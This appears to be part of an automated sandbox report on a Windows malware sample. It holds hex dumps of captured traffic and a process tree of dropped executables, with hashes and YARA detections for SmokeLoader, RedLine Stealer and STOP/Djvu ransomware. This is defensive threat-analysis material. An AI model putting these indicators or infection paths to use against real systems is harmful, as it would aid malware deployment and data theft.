                                                                                                                2022-10-13 11:08:17 UTC5550INData Raw: 07 97 55 c6 05 bb 0a e4 07 99 7f ce 0d 84 55 c6 05 bb 0a e4 07 99 7f ce 07 93 7f f7 37 91 7f df 07 93 7f 61 07 93 6e e4 07 91 04 a8 06 93 7b ee 11 98 54 c4 01 94 e5 e8 07 90 10 f7 06 93 79 ec 68 a6 7f e4 0d 9e 76 c8 01 93 68 f7 03 b8 6f e4 00 84 27 ef 00 95 f1 8d 35 49 69 f7 03 b8 7f f5 03 b9 51 97 b4 91 7f e2 87 de 7e e4 03 b9 5d e6 2f e6 7f e4 0d 93 55 ce 04 fc 8f e4 07 95 6b 1a 04 b9 61 e7 68 63 7f e4 01 b9 51 97 b0 91 7f e2 87 c0 7e e4 03 b9 5d e6 2f e6 7f e4 0d 93 55 f7 37 96 7f a4 07 93 7f e4 07 93 7f e7 10 1e e7 e4 07 92 5a f2 18 a9 e2 8b bd 93 7f ee 10 09 0d 20 30 93 0f cc 77 93 7f ee 2a 8c 7c f3 8a 0b 7f e4 06 b6 69 fb 3d 0e 10 5e 07 93 75 f3 9d e1 b5 d3 07 e3 57 94 07 93 75 cf 06 84 55 f7 37 91 7f aa 07 93 7f e4 07 93 7f e7 68 fa 7d e4 0d 84 4c
                                                                                                                Data Ascii: UU7an{Tyhvho'5IiQ~]/UkahcQ~]/U7Z 0w*|i=^uWuU7h}L
                                                                                                                2022-10-13 11:08:17 UTC5566INData Raw: 07 82 30 e4 07 91 7f 84 4a 93 7f e5 07 1f 67 e4 07 91 7f f5 48 93 7f e5 07 f4 30 e4 07 91 7f 5d 4a 93 7f e7 07 e1 66 e4 07 97 7f a3 4a 93 7f e1 07 42 54 e4 07 92 7f 39 2c 93 7f e5 07 71 54 e4 07 91 7f 92 3e 93 7f e7 07 0f 60 e4 07 92 7f 39 2c 93 7f e6 07 f4 30 e6 07 90 7f e8 48 93 7f e5 07 4e 54 e4 07 91 7f db 24 93 7f e5 07 d1 39 e4 07 92 7f 69 1f 93 7f e6 07 48 5c f4 17 90 7f 06 48 93 7f e5 07 1e 67 e4 07 91 7f 3f 24 83 6f e7 07 71 30 e4 07 92 7f ad 18 93 7f e5 07 1b 39 e4 07 92 7f 3e 4b 93 7f e6 07 92 30 e4 07 92 7f 89 39 93 7f e5 07 20 3e e4 07 92 7f 08 0d 93 7f e6 07 92 30 e4 07 92 7f 77 42 93 7f e5 07 00 3a e4 07 92 7f cd 4e 91 7f e5 07 f7 3d e4 07 92 7f cd 4e 93 7f e5 07 ba 36 e4 07 92 7f cd 4e 93 7f e5 07 ba 36 e4 07 92 7f cd 4e 93 7f e5 07 ba 36
                                                                                                                Data Ascii: 0JgH0]JfJBT9,qT>`9,0HNT$9iH\Hg?$oq09>K09 >0wB:N=N6N6N6
                                                                                                                2022-10-13 11:08:17 UTC5582INData Raw: 11 d1 4e e4 07 93 7f e0 07 93 7f e4 07 93 7f e4 07 93 7f 53 11 8d 2e e4 07 93 7f e0 07 93 7f e4 07 93 7f e4 07 93 7f 4a 11 35 4f e4 07 93 7f e0 07 93 7f e4 07 93 7f e4 07 93 7f 24 11 77 50 e4 07 93 7f e0 07 93 7f e4 07 93 7f e4 07 93 7f 53 11 7f 53 e4 07 93 7f e0 07 93 7f e4 07 93 7f e4 07 93 7f 4a 11 80 4d e4 07 93 7f e0 07 93 7f e4 07 93 7f e4 07 93 7f 24 11 03 3c e4 07 93 7f e0 07 93 7f e4 07 93 7f e4 07 93 7f 53 11 a9 36 e4 07 93 7f e0 07 93 7f e4 07 93 7f e4 07 93 7f 4a 11 f3 3c e4 07 93 7f e0 07 93 7f e4 07 93 7f e4 07 93 7f 4a 11 cc 4b e4 07 93 7f e0 07 93 7f e4 07 93 7f e4 07 93 7f 53 11 d8 47 e4 07 93 7f b0 07 91 7f b1 07 91 7f b2 07 97 7f b3 07 96 7f bc 07 95 7f bd 07 95 7f be 07 95 7f bf 07 95 7f b8 07 95 7f b9 07 95 7f ba 07 95 7f bb 07 99 7f
                                                                                                                Data Ascii: NS.J5O$wPSSJM$<S6J<JKSG
                                                                                                                2022-10-13 11:08:17 UTC5598INData Raw: 72 e1 0c 8b 75 93 17 a7 72 e1 0c 8b 75 93 2c 81 73 d0 0a 96 74 fc 0d e4 4e c7 1e 97 6c c3 0d 8b 64 f6 0c 97 68 e1 7f a7 68 ff 10 96 53 e1 1e 8a 74 ff 1e 90 68 e1 7f ad 42 fd 0a 89 62 e1 1e 90 68 e1 7f a9 66 fd 1e 83 62 fe 1a 8a 73 dc 1d 8e 62 f0 0b a1 69 e6 12 81 75 f2 0b 8b 75 93 2c 9d 74 e7 1a 89 29 d0 10 88 6b f6 1c 90 6e fc 11 97 29 d4 1a 8a 62 e1 16 87 29 da 3a 8a 72 fe 1a 96 66 f1 13 81 3b d6 11 90 6e e7 06 d1 39 bd 38 81 73 d6 11 91 6a f6 0d 85 73 fc 0d e4 54 ea 0c 90 62 fe 51 a7 68 ff 13 81 64 e7 16 8b 69 e0 51 ad 42 fd 0a 89 62 e1 1e 86 6b f6 51 a3 62 e7 3a 8a 72 fe 1a 96 66 e7 10 96 07 d2 1c 90 6e e5 1e 90 68 e1 7f ca 64 e7 10 96 07 d6 07 90 75 f2 1c 90 68 e1 7f ca 64 f0 0b 8b 75 93 1c 8b 69 fd 1a 87 73 fc 0d e4 55 fc 0c a7 68 fe 31 85 63 e9 10
                                                                                                                Data Ascii: ruru,stNldhhSthBbhfbsbiuu,t)kn)b):rf;n98sjsTbQhdiQBbkQb:rfnhduhduisUh1c
                                                                                                                2022-10-13 11:08:17 UTC5614INData Raw: 64 93 0b e4 6e 93 10 e4 69 93 0c e4 2d 93 7f c1 54 93 06 e4 74 93 0b e4 62 93 12 e4 29 93 3c e4 68 93 13 e4 6b 93 1a e4 64 93 0b e4 6e 93 10 e4 69 93 0c e4 07 90 57 e4 07 9e 2a e4 49 93 36 e4 56 93 2a e4 42 93 7f fb 64 93 0c e4 73 93 0d e4 6e 93 11 e4 60 93 12 e4 74 93 0b e4 75 93 16 e4 69 93 18 e4 63 93 7f e9 74 93 0b e4 75 93 16 e4 69 93 18 e4 07 b0 50 e4 57 93 0d e4 68 93 1c e4 62 93 0c e4 74 93 3c e4 27 93 2f e4 75 93 10 e4 64 93 1a e4 74 93 0c e4 07 9c 2f e4 75 93 10 e4 64 93 1a e4 74 93 0c e4 07 90 03 e4 07 90 5d e4 07 9c 3e e4 75 93 12 e4 62 93 11 e4 6e 93 1e e4 07 86 3e e4 7d 93 1a e4 75 93 1d e4 66 93 16 e4 6d 93 1e e4 69 93 7f eb 45 93 1a e4 6b 93 1e e4 75 93 0a e4 74 93 7f f1 4c 93 1e e4 7d 93 1e e4 6c 93 17 e4 74 93 0b e4 66 93 11 e4 07 86 34
                                                                                                                Data Ascii: dni-Ttb)<hkdniW*I6V*Bdsn`tuictuiPWhbt<'/udt/udt]>ubn>}ufmiEkutL}ltf4
                                                                                                                2022-10-13 11:08:17 UTC5630INData Raw: 07 e7 7f 81 07 fe 7f 87 07 e7 7f 98 07 d2 7f 8a 07 e7 7f 8d 07 d5 7f 8d 07 ff 7f 81 07 c0 7f 9d 07 e0 7f 90 07 f6 7f 89 07 c0 7f 94 07 ea 7f b3 07 d5 7f 8d 07 ff 7f 81 07 c0 7f 9d 07 e0 7f 90 07 f6 7f 89 07 f2 7f 96 07 f6 7f b4 07 e1 7f 8b 07 d5 7f 8d 07 ff 7f 81 07 c0 7f 9d 07 e0 7f 90 07 f6 7f 89 07 f7 7f 91 07 f0 7f 90 07 ef 7f a2 07 fa 7f 96 07 f6 7f a2 07 fa 7f 88 07 f6 7f b7 07 ea 7f 97 07 e7 7f 81 07 fe 7f 93 07 f2 7f 88 07 ff 7f b4 07 e1 7f 8b 07 f7 7f a2 07 fa 7f 88 07 f6 7f b7 07 ea 7f 97 07 e7 7f 81 07 fe 7f 91 07 f0 7f 90 07 93 7f e4 07 93 7f ce 07 e0 7f 97 07 f5 7f 8a 07 b9 7f e4 07 93 7f a0 07 fa 7f 97 07 e3 7f 88 07 f2 7f 9d 07 c5 7f 81 07 e1 7f 97 07 fa 7f 8b 07 fd 7f e4 07 93 7f c1 07 ff 7f 8b 07 f0 7f 85 07 ff 7f 85 07 e3 7f 94 07 f7 7f
                                                                                                                Data Ascii:
                                                                                                                2022-10-13 11:08:17 UTC5646INData Raw: 37 bd 37 66 38 6f 38 77 38 b3 38 bd 38 c6 38 cf 38 e4 38 ed 38 1c 39 25 39 2e 39 3c 39 45 39 67 39 6e 39 7d 39 bd 39 c3 39 c9 39 cf 39 d5 39 db 39 e1 39 e7 39 ed 39 f3 39 f9 39 ff 39 05 3a 0b 3a 11 3a 17 3a 1d 3a 23 3a 29 3a 2f 3a 35 3a 3b 3a 41 3a 47 3a 4d 3a 53 3a 59 3a 5f 3a 65 3a 28 3b 3f 3b 87 3b 9f 3b a4 3b 1b 3c b1 3c c2 3c eb 3f 00 00 00 20 02 00 64 00 00 00 01 30 14 30 1f 30 a7 30 53 31 0e 32 16 33 46 33 84 33 97 33 b5 33 c3 33 71 35 a8 35 af 35 b4 35 b8 35 bc 35 c0 35 16 36 5b 36 60 36 64 36 68 36 6c 36 04 39 17 39 35 39 43 39 f1 3a 28 3b 2f 3b 34 3b 38 3b 3c 3b 40 3b 96 3b db 3b e0 3b e4 3b e8 3b ec 3b 85 3e 98 3e 10 3f 00 00 00 30 02 00 0c 00 00 00 7c 36 00 00 00 40 02 00 4c 00 00 00 86 37 8a 37 8e 37 92 37 96 37 9a 37 9e 37 a2 37 a6 37 aa 37
                                                                                                                Data Ascii: 77f8o8w88888889%9.9<9E9g9n9}9999999999999:::::#:):/:5:;:A:G:M:S:Y:_:e:(;?;;;;<<<? d0000S123F33333q55555556[6`6d6h6l69959C9:(;/;4;8;<;@;;;;;;;>>?0|6@L7777777777


                                                                                                                Click to jump to process

                                                                                                                Target ID:0
                                                                                                                Start time:13:06:08
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                Imagebase:0x400000
                                                                                                                File size:216064 bytes
                                                                                                                MD5 hash:9E93319D00389F1C55611665E404EA9B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.405539182.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.305829321.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.405852892.0000000000758000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:low

                                                                                                                Target ID:1
                                                                                                                Start time:13:06:16
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                Imagebase:0x7ff69bc80000
                                                                                                                File size:3933184 bytes
                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:high

                                                                                                                Target ID:4
                                                                                                                Start time:13:07:14
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Users\user\AppData\Roaming\tfgatra
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\AppData\Roaming\tfgatra
                                                                                                                Imagebase:0x400000
                                                                                                                File size:216064 bytes
                                                                                                                MD5 hash:9E93319D00389F1C55611665E404EA9B
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.624566316.0000000000738000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.615454520.00000000005A0000.00000040.00000010.00020000.00000000.sdmp, Author: unknown
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                Reputation:low

                                                                                                                Target ID:5
                                                                                                                Start time:13:07:16
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\ECFD.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\ECFD.exe
                                                                                                                Imagebase:0x400000
                                                                                                                File size:840192 bytes
                                                                                                                MD5 hash:3FD2BBEEEF907E2943FF4E2F6FB24E9A
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                Reputation:moderate

                                                                                                                Target ID:6
                                                                                                                Start time:13:07:18
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\F4FD.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\F4FD.exe
                                                                                                                Imagebase:0x400000
                                                                                                                File size:215552 bytes
                                                                                                                MD5 hash:248CBD4B28F796FDBE02725BDB75751A
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.522204411.00000000007C8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.514667473.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                Reputation:low

                                                                                                                Target ID:7
                                                                                                                Start time:13:07:25
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\857.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\857.exe
                                                                                                                Imagebase:0x400000
                                                                                                                File size:6174208 bytes
                                                                                                                MD5 hash:DCB68CBD2858A21413D9EEF6CEB74743
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                Reputation:low

                                                                                                                Target ID:8
                                                                                                                Start time:13:07:31
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\2A57.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\2A57.exe
                                                                                                                Imagebase:0x140000000
                                                                                                                File size:3639808 bytes
                                                                                                                MD5 hash:D4381F0A771033752684747EB4D55FC7
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                Reputation:moderate

                                                                                                                Target ID:9
                                                                                                                Start time:13:07:33
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\ECFD.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\ECFD.exe
                                                                                                                Imagebase:
                                                                                                                File size:840192 bytes
                                                                                                                MD5 hash:3FD2BBEEEF907E2943FF4E2F6FB24E9A
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.532065497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:moderate

                                                                                                                Target ID:10
                                                                                                                Start time:13:07:35
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\3804.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\3804.exe
                                                                                                                Imagebase:0x400000
                                                                                                                File size:214528 bytes
                                                                                                                MD5 hash:DCFBBF3AE2711BDA9BF01083B521D01B
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000000.533159957.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000002.601332950.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000000.526425573.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000000.528795065.0000000000728000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.608132947.0000000000728000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000000.535019814.0000000000728000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                Reputation:low

                                                                                                                Target ID:11
                                                                                                                Start time:13:07:37
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\543.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\543.exe
                                                                                                                Imagebase:0x400000
                                                                                                                File size:302592 bytes
                                                                                                                MD5 hash:9A1AC1F6D72E30C8E7577955CD6F39C0
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000B.00000000.529399844.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000000.531541187.000000000070B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000B.00000002.597495979.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000B.00000000.536317423.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.597582689.000000000070B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000000.537288789.000000000070B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                Reputation:moderate

                                                                                                                Target ID:12
                                                                                                                Start time:13:07:39
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\EAA.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\EAA.exe
                                                                                                                Imagebase:0x140000000
                                                                                                                File size:3639808 bytes
                                                                                                                MD5 hash:D4381F0A771033752684747EB4D55FC7
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML

                                                                                                                Target ID:13
                                                                                                                Start time:13:07:41
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                Imagebase:0xee0000
                                                                                                                File size:3611360 bytes
                                                                                                                MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000000.499608553.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                                                                                                Target ID:15
                                                                                                                Start time:13:07:43
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\explorer.exe
                                                                                                                Imagebase:0x7ff69bc80000
                                                                                                                File size:3933184 bytes
                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language

                                                                                                                Target ID:18
                                                                                                                Start time:13:08:00
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 812 -s 520
                                                                                                                Imagebase:0x300000
                                                                                                                File size:434592 bytes
                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language

                                                                                                                Target ID:19
                                                                                                                Start time:13:08:00
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 532
                                                                                                                Imagebase:0x300000
                                                                                                                File size:434592 bytes
                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language

                                                                                                                Target ID:21
                                                                                                                Start time:13:08:02
                                                                                                                Start date:13/10/2022
                                                                                                                Path:C:\Users\user\AppData\Roaming\udgatra
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\AppData\Roaming\udgatra
                                                                                                                Imagebase:0x400000
                                                                                                                File size:215552 bytes
                                                                                                                MD5 hash:248CBD4B28F796FDBE02725BDB75751A
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML

                                                                                                                No disassembly